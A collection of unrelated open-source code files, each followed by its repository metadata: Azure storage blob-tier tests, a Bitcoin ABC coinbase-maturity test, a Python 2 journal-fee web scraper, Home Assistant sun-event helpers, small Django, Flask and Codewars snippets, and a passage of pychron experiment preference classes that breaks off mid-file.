self.assertEquals(len(batch_set_blob_tier_request), len(resp))
for i in range(0, len(tiers)):
is_successful = resp[i].is_successful
# for every even indexed sub-request, the blob should be deleted successfully
if i % 2 is 0:
self.assertEquals(is_successful, True, "sub-request" + str(i) + "should be true")
# For every odd indexed sub-request, there should be a 404 http status code because the blob is non-existing
else:
self.assertEquals(is_successful, False, "sub-request" + str(i) + "should be false")
self.assertEquals(404, resp[i].http_response.status)
@record
def test_batch_set_standard_blob_tier_api_with_non_askii_blob_name(self):
# Arrange
self.bs.create_container(self.container_name)
tiers = [StandardBlobTier.Archive, StandardBlobTier.Cool, StandardBlobTier.Hot]
batch_set_blob_tier_request = []
for tier in tiers:
blob_name = "ööööööööö"
data = b'hello world'
self.bs.create_blob_from_bytes(self.container_name, blob_name, data)
sub_request = BatchSetBlobTierSubRequest(self.container_name, blob_name, tier)
batch_set_blob_tier_request.append(sub_request)
# Act
resp = self.bs.batch_set_standard_blob_tier(batch_set_blob_tier_request)
# Assert
self.assertIsNotNone(resp)
self.assertEquals(len(batch_set_blob_tier_request), len(resp))
for sub_response in resp:
self.assertTrue(sub_response.is_successful)
@record
def test_batch_set_non_existing_blob_tier(self):
# Arrange
self.bs.create_container(self.container_name)
tiers = [StandardBlobTier.Archive, StandardBlobTier.Cool, StandardBlobTier.Hot]
batch_set_blob_tier_request = []
for tier in tiers:
blob_name = self._get_blob_reference()
sub_request = BatchSetBlobTierSubRequest(self.container_name, blob_name, tier)
batch_set_blob_tier_request.append(sub_request)
# Act
resp = self.bs.batch_set_standard_blob_tier(batch_set_blob_tier_request)
# Assert
self.assertIsNotNone(resp)
self.assertEquals(len(batch_set_blob_tier_request), len(resp))
for sub_response in resp:
self.assertFalse(sub_response.is_successful)
@record
def test_rehydration_status(self):
blob_name = 'rehydration_test_blob_1'
blob_name2 = 'rehydration_test_blob_2'
data = b'hello world'
self.bs.create_blob_from_bytes(self.container_name, blob_name, data)
self.bs.set_standard_blob_tier(self.container_name, blob_name, StandardBlobTier.Archive)
self.bs.set_standard_blob_tier(self.container_name, blob_name, StandardBlobTier.Cool)
blob_ref = self.bs.get_blob_properties(self.container_name, blob_name)
self.assertEqual(StandardBlobTier.Archive, blob_ref.properties.blob_tier)
self.assertEqual("rehydrate-pending-to-cool", blob_ref.properties.rehydration_status)
self.assertFalse(blob_ref.properties.blob_tier_inferred)
blobs = list(self.bs.list_blobs(self.container_name))
self.bs.delete_blob(self.container_name, blob_name)
# Assert
self.assertIsNotNone(blobs)
self.assertGreaterEqual(len(blobs), 1)
self.assertIsNotNone(blobs[0])
self.assertNamedItemInContainer(blobs, blob_name)
self.assertEqual(StandardBlobTier.Archive, blobs[0].properties.blob_tier)
self.assertEqual("rehydrate-pending-to-cool", blobs[0].properties.rehydration_status)
self.assertFalse(blobs[0].properties.blob_tier_inferred)
self.bs.create_blob_from_bytes(self.container_name, blob_name2, data)
self.bs.set_standard_blob_tier(self.container_name, blob_name2, StandardBlobTier.Archive)
self.bs.set_standard_blob_tier(self.container_name, blob_name2, StandardBlobTier.Hot)
blob_ref2 = self.bs.get_blob_properties(self.container_name, blob_name2)
self.assertEqual(StandardBlobTier.Archive, blob_ref2.properties.blob_tier)
self.assertEqual("rehydrate-pending-to-hot", blob_ref2.properties.rehydration_status)
self.assertFalse(blob_ref2.properties.blob_tier_inferred)
blobs = list(self.bs.list_blobs(self.container_name))
# Assert
self.assertIsNotNone(blobs)
self.assertGreaterEqual(len(blobs), 1)
self.assertIsNotNone(blobs[0])
self.assertNamedItemInContainer(blobs, blob_name2)
self.assertEqual(StandardBlobTier.Archive, blobs[0].properties.blob_tier)
self.assertEqual("rehydrate-pending-to-hot", blobs[0].properties.rehydration_status)
self.assertFalse(blobs[0].properties.blob_tier_inferred)
# ------------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "839f00c9fca49a69ac7e47563e1cf7c4",
"timestamp": "",
"source": "github",
"line_count": 324,
"max_line_length": 120,
"avg_line_length": 43.00617283950617,
"alnum_prop": 0.6437491029137362,
"repo_name": "Azure/azure-storage-python",
"id": "262a35439c4386774e833b52aec75643ee2e970a",
"size": "14271",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/blob/test_blob_storage_account.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "779"
},
{
"name": "Python",
"bytes": "1674801"
},
{
"name": "Shell",
"bytes": "168"
}
],
"symlink_target": ""
} |
"""Test spending coinbase transactions.
The coinbase transaction in block N can appear in block
N+100... so is valid in the mempool when the best block
height is N+99.
This test makes sure coinbase spends that will be mature
in the next block are accepted into the memory pool,
but less mature coinbase spends are NOT.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
from test_framework.wallet import MiniWallet
class MempoolSpendCoinbaseTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
def run_test(self):
wallet = MiniWallet(self.nodes[0])
# Invalidate two blocks, so that miniwallet has access to a coin that
# will mature in the next block
chain_height = 198
self.nodes[0].invalidateblock(
self.nodes[0].getblockhash(
chain_height + 1))
assert_equal(chain_height, self.nodes[0].getblockcount())
wallet.rescan_utxos()
# Coinbase at height chain_height-100+1 ok in mempool, should
# get mined. Coinbase at height chain_height-100+2 is
# too immature to spend.
def coinbase_txid(h):
return self.nodes[0].getblock(
self.nodes[0].getblockhash(h))['tx'][0]
utxo_mature = wallet.get_utxo(
txid=coinbase_txid(
chain_height - 100 + 1))
utxo_immature = wallet.get_utxo(
txid=coinbase_txid(
chain_height - 100 + 2))
spend_mature_id = wallet.send_self_transfer(
from_node=self.nodes[0], utxo_to_spend=utxo_mature)["txid"]
# other coinbase should be too immature to spend
immature_tx = wallet.create_self_transfer(
from_node=self.nodes[0],
utxo_to_spend=utxo_immature,
mempool_valid=False)
assert_raises_rpc_error(-26,
"bad-txns-premature-spend-of-coinbase",
lambda: self.nodes[0].sendrawtransaction(immature_tx['hex']))
# mempool should have just the mature one
assert_equal(self.nodes[0].getrawmempool(), [spend_mature_id])
# mine a block, mature one should get confirmed
self.generate(self.nodes[0], 1)
assert_equal(set(self.nodes[0].getrawmempool()), set())
# ... and now previously immature can be spent:
spend_new_id = self.nodes[0].sendrawtransaction(immature_tx['hex'])
assert_equal(self.nodes[0].getrawmempool(), [spend_new_id])
if __name__ == '__main__':
MempoolSpendCoinbaseTest().main()
| {
"content_hash": "28b50293b426e380aa69c659ae40cefd",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 93,
"avg_line_length": 37.50704225352113,
"alnum_prop": 0.6308674427337589,
"repo_name": "Bitcoin-ABC/bitcoin-abc",
"id": "14786a500cee2182c8f37e93a91c2caf1053376b",
"size": "2877",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/functional/mempool_spend_coinbase.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "28178"
},
{
"name": "C",
"bytes": "1160721"
},
{
"name": "C++",
"bytes": "9817660"
},
{
"name": "CMake",
"bytes": "195193"
},
{
"name": "CSS",
"bytes": "4284"
},
{
"name": "Dockerfile",
"bytes": "3559"
},
{
"name": "HTML",
"bytes": "25754"
},
{
"name": "Java",
"bytes": "41238"
},
{
"name": "JavaScript",
"bytes": "2366459"
},
{
"name": "Kotlin",
"bytes": "3712"
},
{
"name": "M4",
"bytes": "31132"
},
{
"name": "Makefile",
"bytes": "100617"
},
{
"name": "Objective-C++",
"bytes": "5811"
},
{
"name": "PHP",
"bytes": "94504"
},
{
"name": "Perl",
"bytes": "4551"
},
{
"name": "PowerShell",
"bytes": "2277"
},
{
"name": "Python",
"bytes": "2706993"
},
{
"name": "QMake",
"bytes": "798"
},
{
"name": "Ruby",
"bytes": "21108"
},
{
"name": "Rust",
"bytes": "54953"
},
{
"name": "Sage",
"bytes": "39795"
},
{
"name": "Shell",
"bytes": "167526"
},
{
"name": "TypeScript",
"bytes": "66320"
}
],
"symlink_target": ""
} |
import csv
import itertools
import logging
import re
import urllib2
from datetime import date
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support.ui import Select
from exceptions import MissingAttributeException
from base import BaseJournalScraper
class BioMedCentralScraper(BaseJournalScraper):
"""Web scraper for publisher BioMed Central
Attributes:
http_address (str): Address of the BioMed Central webpage with journal information
"""
paid_for_patt = re.compile("do not need to pay")
def __init__(self, http_address):
f = urllib2.urlopen(http_address, timeout=5)
self.soup = BeautifulSoup(f, 'lxml')
@staticmethod
def __get_price(soup):
for tag in soup.find_all(class_="CmsArticle_body"):
text = tag.get_text()
price_matches = BioMedCentralScraper.PRICE_PATT.findall(text)
paid_for_matches = BioMedCentralScraper.paid_for_patt.findall(text)
if price_matches:
return str(int(round(float(price_matches[0].replace(",", "").replace("$", "").replace("'", "")))))
elif paid_for_matches:
return 0
raise MissingAttributeException
@staticmethod
def __get_journal_name(soup):
journal_name_tag = soup.find(class_="identity__title-link")
if not journal_name_tag:
raise MissingAttributeException
return journal_name_tag.string
@staticmethod
def __get_issn(soup):
issn_tag = soup.find(class_="SideBox_defList")
if not issn_tag:
raise MissingAttributeException
issn_matches = BioMedCentralScraper.ISSN_PATT.findall(issn_tag.get_text())
if not issn_matches:
raise MissingAttributeException
return issn_matches[0]
def get_entries(self):
for tag in self.soup.find_all(class_="list-stacked__item"):
link = tag.find("a")["href"]
try:
g = urllib2.urlopen(link + "about", timeout=5)
about_soup = BeautifulSoup(g, 'lxml')
except Exception:
print link + ": Connection problems, continuing to the next entry"
continue
try:
price = BioMedCentralScraper.__get_price(about_soup)
except MissingAttributeException:
print link
print "\n\tNo price could be found"
continue # skipping to the next entry
try:
journal_name = BioMedCentralScraper.__get_journal_name(about_soup)
except MissingAttributeException:
print link
print "\n\tNo journal name could be found"
continue # skipping to the next entry
try:
issn = BioMedCentralScraper.__get_issn(about_soup)
except MissingAttributeException:
print link
print "\n\tNo ISSN could be found"
continue
yield self.to_unicode_row(["BioMed Central", journal_name, str(date.today()), "OA", issn, str(price)])
class ElsevierScraper(BaseJournalScraper):
def __init__(self, csv_filepath):
f = open(csv_filepath, "r")
self.reader = csv.reader(f)
next(self.reader)
def get_entries(self):
for row in self.reader:
row = [BaseJournalScraper.clean_string(i) for i in row]
yield BaseJournalScraper.to_unicode_row(["Elsevier", row[1], str(date.today()),
'Hybrid' if row[2] == 'Hybrid' else 'OA',
row[0], str(int(round(float(row[4]))))])
class ExistingScraper(BaseJournalScraper):
def __init__(self, csv_filepath):
f = open(csv_filepath, "rU")
self.reader = csv.reader(f, dialect=csv.excel_tab)
next(self.reader)
@staticmethod
def __get_row(row):
if not row[2]:
raise MissingAttributeException
return BaseJournalScraper.to_unicode_row((row[0], row[1], row[6],
"OA" if row[4] else "Hybrid", row[2], str(int(round(float(row[4]))))))
def get_entries(self):
for row in self.reader:
try:
yield ExistingScraper.__get_row(row)
except MissingAttributeException as e:
logging.warning(str(row) + str(e))
class HindawiScraper(BaseJournalScraper):
def __init__(self, http_address):
f = urllib2.urlopen(http_address, timeout=5)
self.soup = BeautifulSoup(f, 'lxml')
@staticmethod
def __get_title(tag):
return tag.find("a").string.strip()
@staticmethod
def __get_price(results):
price_matches = BaseJournalScraper.PRICE_PATT.findall(results[1])
if not price_matches:
raise MissingAttributeException
return str(int(round(float(price_matches[0].replace(",", "").replace("$", "")))))
@staticmethod
def __get_issn(results):
issn_matches = BaseJournalScraper.ISSN_PATT.findall(results[0])
if not issn_matches:
raise MissingAttributeException
return issn_matches[0]
def get_entries(self):
for tag in itertools.chain(self.soup.find_all(class_="subscription_table_plus"),
self.soup.find_all(class_="subscription_table_minus")):
journal_title = HindawiScraper.__get_title(tag)
results = [i.string for i in tag.find_all("td") if i.string]
if not results or (len(results) != 2):
print "ERROR:"
print "\t" + str(tag.contents)
continue
try:
price = HindawiScraper.__get_price(results)
issn = HindawiScraper.__get_issn(results)
except MissingAttributeException:
print "ERROR:"
print "\t" + str(tag.contents)
continue
yield BaseJournalScraper.to_unicode_row(["Hindawi", journal_title, str(date.today()), "OA", issn, price])
class PLOSScraper(BaseJournalScraper):
"""
Scraper isn't actually finished yet. Can't port it
"""
def __init__(self, http_address):
driver = webdriver.PhantomJS(executable_path="/usr/local/bin/phantomjs")
driver.set_window_size(1120, 550)
driver.get("https://www.plos.org/publication-fees")
a = driver.find_elements_by_class_name("feature-block-text")
for i in a:
# print i.text
pass
def get_entries(self):
raise StopIteration
class SageHybridScraper(BaseJournalScraper):
"""
Scraper isn't actually finished yet. Can't port it
"""
def __init__(self, http_address):
pass
def get_entries(self):
raise StopIteration
class SpringerHybridScraper(BaseJournalScraper):
def __init__(self, csv_path):
f = open(csv_path, "r")
self.reader = csv.reader(f)
for i in range(9):
next(self.reader)
def get_entries(self):
for row in self.reader:
if row[11] == "Hybrid (Open Choice)":
yield BaseJournalScraper.to_unicode_row(["Springer", BaseJournalScraper.clean_string(row[1]),
str(date.today()), "Hybrid", row[5], str(3000)])
class SpringerOpenScraper(BaseJournalScraper):
def __init__(self, http_address):
f = urllib2.urlopen(http_address, timeout=5)
self.soup = BeautifulSoup(f, 'lxml')
@staticmethod
def __get_price(soup):
for tag in soup.find_all(class_="CmsArticle_body"):
text = tag.get_text()
price_matches = SpringerOpenScraper.PRICE_PATT.findall(text)
if price_matches:
return str(int(round(float(price_matches[0].replace(",", "").replace("$", "").replace("'", "")))))
raise MissingAttributeException
@staticmethod
def __get_journal_name(soup):
journal_name_tag = soup.find(id="journalTitle")
if not journal_name_tag:
raise MissingAttributeException
return journal_name_tag.string
@staticmethod
def __get_issn(soup):
issn_tag = soup.find(class_="SideBox_defList")
if not issn_tag:
raise MissingAttributeException
issn_matches = SpringerOpenScraper.ISSN_PATT.findall(issn_tag.get_text())
if not issn_matches:
raise MissingAttributeException
return issn_matches[0]
def get_entries(self):
for tag in self.soup.find_all(class_="list-stacked__item"):
link = tag.find("a")["href"]
if "springeropen.com" not in link:
print link + ": Not valid"
continue
try:
g = urllib2.urlopen(link + "about", timeout=5).read()
about_soup = BeautifulSoup(g, 'lxml')
except Exception:
print link + ": Connection problems, continuing to the next entry"
continue
try:
price = SpringerOpenScraper.__get_price(about_soup)
except MissingAttributeException:
print link + ": No price could be found"
continue # skipping to the next entry
try:
journal_name = SpringerOpenScraper.__get_journal_name(about_soup)
except MissingAttributeException:
print link + ": No journal name could be found"
continue # skipping to the next entry
try:
issn = SpringerOpenScraper.__get_issn(about_soup)
except MissingAttributeException:
print link + ": No ISSN could be found"
continue
yield self.to_unicode_row(["Springer", journal_name, str(date.today()), "OA", issn, str(price)])
class WileyScraper(BaseJournalScraper):
def __init__(self, http_address):
f = urllib2.urlopen(http_address)
self.soup = BeautifulSoup(f, 'lxml')
self.driver = webdriver.PhantomJS(executable_path="/usr/local/bin/phantomjs")
self.driver.set_window_size(1120, 550)
self.driver.get(http_address)
@staticmethod
def __get_child_tag_strings(tag):
for child in tag.children:
if not (str(child) == "\n"):
yield child.string
def __get_issn(self):
issn_matches = (WileyScraper.ISSN_PATT
.findall(self.driver
.find_element_by_xpath("//div[@id='displayJAPCL']/a[1]")
.get_attribute("href")))
if not issn_matches:
raise MissingAttributeException
return issn_matches[0]
def __get_price(self):
try:
price = str(int(round(float(self.driver.find_element_by_id("displayJAPC")
.text.replace(",", "").replace("$", "")))))
except ValueError as e:
raise MissingAttributeException
return price
def get_entries(self):
selected = self.soup.find(class_="journal")
journal_select = Select(self.driver.find_element_by_id("journal"))
# getting rid of first "description" row
journal_gen = WileyScraper.__get_child_tag_strings(selected)
next(journal_gen)
for journal in journal_gen:
try:
journal_select.select_by_visible_text(journal)
except NoSuchElementException:
print "Couldn't find matching journal for input: " + str(journal)
continue
oa_option_element = self.driver.find_element_by_id("displayJOAP")
if (oa_option_element.text == "Fully Open Access") or (oa_option_element.text == "OpenChoice"):
try:
price = self.__get_price()
except MissingAttributeException:
print journal + ": Unable to find price"
continue
try:
issn_matches = self.__get_issn()
except MissingAttributeException:
print "Error: " + journal + "\n\t" + oa_option_element.text
continue
journal_type = "OA" if oa_option_element.text == "Fully Open Access" else "Hybrid"
yield self.to_unicode_row(["Wiley", journal, str(date.today()), journal_type, issn_matches, price])
| {
"content_hash": "3ea0d45e26965dbff329201a6c86ec66",
"timestamp": "",
"source": "github",
"line_count": 345,
"max_line_length": 117,
"avg_line_length": 36.26086956521739,
"alnum_prop": 0.5806554756195044,
"repo_name": "PatrickSpieker/ThePyStrikesBack",
"id": "cb6c8cb6291df6eee2acfbe318315ec4fe55853c",
"size": "12546",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "scrapers/journalscrapers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "22749"
}
],
"symlink_target": ""
} |
"""Helpers for sun events."""
from __future__ import annotations
import datetime
from typing import TYPE_CHECKING
from homeassistant.const import SUN_EVENT_SUNRISE, SUN_EVENT_SUNSET
from homeassistant.core import HomeAssistant, callback
from homeassistant.loader import bind_hass
from homeassistant.util import dt as dt_util
if TYPE_CHECKING:
import astral
DATA_LOCATION_CACHE = "astral_location_cache"
ELEVATION_AGNOSTIC_EVENTS = ("noon", "midnight")
@callback
@bind_hass
def get_astral_location(
hass: HomeAssistant,
) -> tuple[astral.location.Location, astral.Elevation]:
"""Get an astral location for the current Home Assistant configuration."""
from astral import LocationInfo # pylint: disable=import-outside-toplevel
from astral.location import Location # pylint: disable=import-outside-toplevel
latitude = hass.config.latitude
longitude = hass.config.longitude
timezone = str(hass.config.time_zone)
elevation = hass.config.elevation
info = ("", "", timezone, latitude, longitude)
# Cache astral locations so they aren't recreated with the same args
if DATA_LOCATION_CACHE not in hass.data:
hass.data[DATA_LOCATION_CACHE] = {}
if info not in hass.data[DATA_LOCATION_CACHE]:
hass.data[DATA_LOCATION_CACHE][info] = Location(LocationInfo(*info))
return hass.data[DATA_LOCATION_CACHE][info], elevation
@callback
@bind_hass
def get_astral_event_next(
hass: HomeAssistant,
event: str,
utc_point_in_time: datetime.datetime | None = None,
offset: datetime.timedelta | None = None,
) -> datetime.datetime:
"""Calculate the next specified solar event."""
location, elevation = get_astral_location(hass)
return get_location_astral_event_next(
location, elevation, event, utc_point_in_time, offset
)
@callback
def get_location_astral_event_next(
location: astral.location.Location,
elevation: astral.Elevation,
event: str,
utc_point_in_time: datetime.datetime | None = None,
offset: datetime.timedelta | None = None,
) -> datetime.datetime:
"""Calculate the next specified solar event."""
if offset is None:
offset = datetime.timedelta()
if utc_point_in_time is None:
utc_point_in_time = dt_util.utcnow()
kwargs = {"local": False}
if event not in ELEVATION_AGNOSTIC_EVENTS:
kwargs["observer_elevation"] = elevation
mod = -1
while True:
try:
next_dt: datetime.datetime = (
getattr(location, event)(
dt_util.as_local(utc_point_in_time).date()
+ datetime.timedelta(days=mod),
**kwargs,
)
+ offset
)
if next_dt > utc_point_in_time:
return next_dt
except ValueError:
pass
mod += 1
@callback
@bind_hass
def get_astral_event_date(
hass: HomeAssistant,
event: str,
date: datetime.date | datetime.datetime | None = None,
) -> datetime.datetime | None:
"""Calculate the astral event time for the specified date."""
location, elevation = get_astral_location(hass)
if date is None:
date = dt_util.now().date()
if isinstance(date, datetime.datetime):
date = dt_util.as_local(date).date()
kwargs = {"local": False}
if event not in ELEVATION_AGNOSTIC_EVENTS:
kwargs["observer_elevation"] = elevation
try:
return getattr(location, event)(date, **kwargs) # type: ignore[no-any-return]
except ValueError:
# Event never occurs for specified date.
return None
@callback
@bind_hass
def is_up(
hass: HomeAssistant, utc_point_in_time: datetime.datetime | None = None
) -> bool:
"""Calculate if the sun is currently up."""
if utc_point_in_time is None:
utc_point_in_time = dt_util.utcnow()
next_sunrise = get_astral_event_next(hass, SUN_EVENT_SUNRISE, utc_point_in_time)
next_sunset = get_astral_event_next(hass, SUN_EVENT_SUNSET, utc_point_in_time)
return next_sunrise > next_sunset
| {
"content_hash": "c083c918f613adc6c6e35b679488cfda",
"timestamp": "",
"source": "github",
"line_count": 137,
"max_line_length": 86,
"avg_line_length": 29.861313868613138,
"alnum_prop": 0.6590075776093864,
"repo_name": "GenericStudent/home-assistant",
"id": "09a329cd2752ba6c7d3954753f96b13f6084cf36",
"size": "4091",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "homeassistant/helpers/sun.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "3070"
},
{
"name": "Python",
"bytes": "44491729"
},
{
"name": "Shell",
"bytes": "5092"
}
],
"symlink_target": ""
} |
from django.conf.urls import url, include
from rest_framework.routers import DefaultRouter
from . import views
router = DefaultRouter()
router.register(r'posts', views.PostViewSet)
router.register(r'comments', views.CommentViewSet)
router.register(r'tags', views.TagViewSet)
urlpatterns = [
url(r'^', include(router.urls)),
]
| {
"content_hash": "6a809d6dc31adaffa6d890a66aa63450",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 50,
"avg_line_length": 25.615384615384617,
"alnum_prop": 0.7657657657657657,
"repo_name": "ppnchb/django-board",
"id": "651249f629f30ff11bed4b6831eaf409e827ea59",
"size": "333",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_board/api_v1/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "2302"
},
{
"name": "Python",
"bytes": "54554"
}
],
"symlink_target": ""
} |
Test.describe('Example test')
array = [1, 2, 3]
Test.assert_equals(find_average(array), 2)
| {
"content_hash": "b8e4104f1abdbcce3d838e5772a43954",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 42,
"avg_line_length": 30.333333333333332,
"alnum_prop": 0.7032967032967034,
"repo_name": "RevansChen/online-judge",
"id": "a5adfe085f06b99a345c14361df6055b68f9e722",
"size": "109",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Codewars/8kyu/calculate-average/Python/test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Brainfuck",
"bytes": "102"
},
{
"name": "C",
"bytes": "6829"
},
{
"name": "C#",
"bytes": "19758"
},
{
"name": "C++",
"bytes": "9439"
},
{
"name": "Clojure",
"bytes": "75"
},
{
"name": "CoffeeScript",
"bytes": "903"
},
{
"name": "Crystal",
"bytes": "52"
},
{
"name": "Dart",
"bytes": "182"
},
{
"name": "Elixir",
"bytes": "1027"
},
{
"name": "Erlang",
"bytes": "132"
},
{
"name": "F#",
"bytes": "40"
},
{
"name": "Go",
"bytes": "83"
},
{
"name": "Haskell",
"bytes": "102"
},
{
"name": "Java",
"bytes": "11057"
},
{
"name": "JavaScript",
"bytes": "44773"
},
{
"name": "Kotlin",
"bytes": "82"
},
{
"name": "Lua",
"bytes": "93"
},
{
"name": "PHP",
"bytes": "2875"
},
{
"name": "Python",
"bytes": "563400"
},
{
"name": "R",
"bytes": "265"
},
{
"name": "Ruby",
"bytes": "7171"
},
{
"name": "Rust",
"bytes": "74"
},
{
"name": "Scala",
"bytes": "84"
},
{
"name": "Shell",
"bytes": "438"
},
{
"name": "Swift",
"bytes": "6597"
},
{
"name": "TSQL",
"bytes": "3531"
},
{
"name": "TypeScript",
"bytes": "5744"
}
],
"symlink_target": ""
} |
from flask import Blueprint
bp = Blueprint('file', __name__, url_prefix='/file')
from . import views
| {
"content_hash": "97766981a8ef21d9b56e6af5ee24d798",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 52,
"avg_line_length": 20.6,
"alnum_prop": 0.6893203883495146,
"repo_name": "justin-sh/amber-and-justin",
"id": "0df335a44e3f1986fd7d08c9f748f953388b5c07",
"size": "103",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blueprints/file/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "145609"
},
{
"name": "HTML",
"bytes": "19598"
},
{
"name": "JavaScript",
"bytes": "117654"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "23686"
}
],
"symlink_target": ""
} |
from envisage.ui.tasks.preferences_pane import PreferencesPane
from traits.api import Str, Int, Bool, Password, Color, Property, Float, Enum
from traitsui.api import View, Item, Group, VGroup, HGroup, UItem
from pychron.core.pychron_traits import PositiveInteger, PositiveFloat
from pychron.core.ui.custom_label_editor import CustomLabel
from pychron.envisage.tasks.base_preferences_helper import (
BasePreferencesHelper,
BaseConsolePreferences,
BaseConsolePreferencesPane,
)
from pychron.pychron_constants import (
QTEGRA_INTEGRATION_TIMES,
XE,
NE,
KR,
HE,
AR_AR,
GENERIC,
)
class ExperimentPreferences(BasePreferencesHelper):
preferences_path = "pychron.experiment"
id = "pychron.experiment.preferences_page"
laboratory = Str
experiment_type = Enum(AR_AR, GENERIC, HE, KR, NE, XE)
instrument_name = Str
use_uuid_path_name = Bool
use_notifications = Bool
notifications_port = PositiveInteger
use_autoplot = Bool
send_config_before_run = Bool
verify_spectrometer_configuration = Bool
use_auto_save = Bool
auto_save_delay = PositiveInteger
baseline_color = Color
sniff_color = Color
signal_color = Color
bg_color = Color
even_bg_color = Color
min_ms_pumptime = PositiveInteger
use_memory_check = Bool
memory_threshold = Property(PositiveInteger, depends_on="_memory_threshold")
_memory_threshold = Int
use_analysis_grouping = Bool
grouping_threshold = Float
grouping_suffix = Str
use_automated_run_monitor = Bool
set_integration_time_on_start = Bool
default_integration_time = Enum(*QTEGRA_INTEGRATION_TIMES)
automated_runs_editable = Bool
use_xls_persistence = Bool
use_db_persistence = Bool
success_color = Color
extraction_color = Color
measurement_color = Color
canceled_color = Color
truncated_color = Color
failed_color = Color
end_after_color = Color
invalid_color = Color
use_analysis_type_colors = Bool
blank_color = Color
air_color = Color
cocktail_color = Color
use_equilibration_analysis = Bool
use_peak_center_threshold = Bool
peak_center_threshold = PositiveFloat(3)
peak_center_threshold_window = PositiveInteger(10)
n_executed_display = PositiveInteger
failed_intensity_count_threshold = PositiveInteger(3)
ratio_change_detection_enabled = Bool(False)
use_preceding_blank = Bool(False)
plot_panel_update_period = PositiveInteger(1)
execute_open_queues = Bool
save_all_runs = Bool
def _get_memory_threshold(self):
return self._memory_threshold
def _set_memory_threshold(self, v):
if v is not None:
self._memory_threshold = v
class UserNotifierPreferences(BasePreferencesHelper):
preferences_path = "pychron.experiment"
server_username = Str
server_password = Password
server_host = Str
server_port = PositiveInteger
include_log = Bool
class ConsolePreferences(BaseConsolePreferences):
preferences_path = "pychron.experiment"
use_message_colormapping = Bool
class HumanErrorCheckerPreferences(BasePreferencesHelper):
preferences_path = "pychron.experiment"
id = "pychron.experiment.humar_error_checker.preferences_page"
extraction_script_enabled = Bool
queue_enabled = Bool
non_fatal_enabled = Bool
runs_enabled = Bool
# ======================================================================================================
# panes
# ======================================================================================================
class HumanErrorCheckerPreferencesPane(PreferencesPane):
model_factory = HumanErrorCheckerPreferences
category = "Experiment"
def traits_view(self):
v = View(
VGroup(
Item(
"queue_enabled",
label="Queue",
tooltip="Check queue for errors like missing Extract Device",
),
Item("runs_enabled", label="Runs", tooltip="Check runs for errors"),
Item(
"non_fatal_enabled",
label="Non-Fatal",
tooltip="Warn user about non-fatal issues like missing scripts",
),
Item(
"extraction_script_enabled",
label="Extraction Script",
tooltip="Check that the Extraction Script matches the Extract Device",
),
show_border=True,
label="Human-Error Checker",
)
)
return v
class ExperimentPreferencesPane(PreferencesPane):
model_factory = ExperimentPreferences
category = "Experiment"
def traits_view(self):
general_grp = VGroup(
Item(
"execute_open_queues",
label="Execute Open Queues",
tooltip="After the active queue finishes continue running any other open tabs "
"in order from left to right",
),
Item("experiment_type", label="Experiment Type"),
Item(
"send_config_before_run",
tooltip="Set the spectrometer configuration before each analysis",
label="Set Spectrometer Configuration on Start",
),
Item(
"verify_spectrometer_configuration",
enabled_when="send_config_before_run",
tooltip="Verify spectrometer configuration is properly set, "
"otherwise cancel experiment",
),
Item(
"default_integration_time", enabled_when="set_integration_time_on_start"
),
Item(
"n_executed_display",
label="N. Executed",
tooltip='Number of analyses to display in the "Executed" table',
),
Item("use_preceding_blank", label="Use Preceding Blank"),
label="General",
)
editor_grp = VGroup(
Item(
"automated_runs_editable",
label="Direct editing",
tooltip="Allow user to edit Automated Runs directly within table. "
"Reopen experiment tab required to take effect",
),
Item(
"use_auto_save",
tooltip='If "Use auto save" experiment queue saved after "timeout" seconds',
),
Item(
"auto_save_delay",
label="Auto save timeout (s)",
tooltip='If experiment queue is not saved then wait "timeout" seconds'
" before saving or canceling",
),
Item("bg_color", label="Background"),
Item("even_bg_color", label="Even Row"),
label="Editor",
)
color_group = VGroup(
VGroup(
Item("sniff_color", label="Equilibration"),
Item("baseline_color", label="Baseline"),
Item("signal_color", label="Signal"),
show_border=True,
label="Measurement Colors",
),
VGroup(
Item("success_color", label="Success"),
Item("extraction_color", label="Extraction"),
Item("measurement_color", label="Measurement"),
Item("canceled_color", label="Canceled"),
Item("truncated_color", label="Truncated"),
Item("failed_color", label="Failed"),
Item("end_after_color", label="End After"),
Item("invalid_color", label="Invalid"),
show_border=True,
label="State Colors",
),
VGroup(
Item("use_analysis_type_colors", label="Use Analysis Type Colors"),
Item("blank_color", label="Blank"),
Item("air_color", label="Air"),
Item("cocktail_color", label="Cocktail"),
),
label="Colors",
)
monitor_grp = Group(
Item(
"use_automated_run_monitor",
label="Use AutomatedRun Monitor",
tooltip="Use the automated run monitor",
),
show_border=True,
label="Monitor",
)
overlap_grp = Group(
Item("min_ms_pumptime", label="Min. Mass Spectrometer Pumptime (s)"),
show_border=True,
label="Overlap",
)
persist_grp = Group(
Item("use_xls_persistence", label="Save analyses to Excel workbook"),
Item("use_db_persistence", label="Save analyses to Database"),
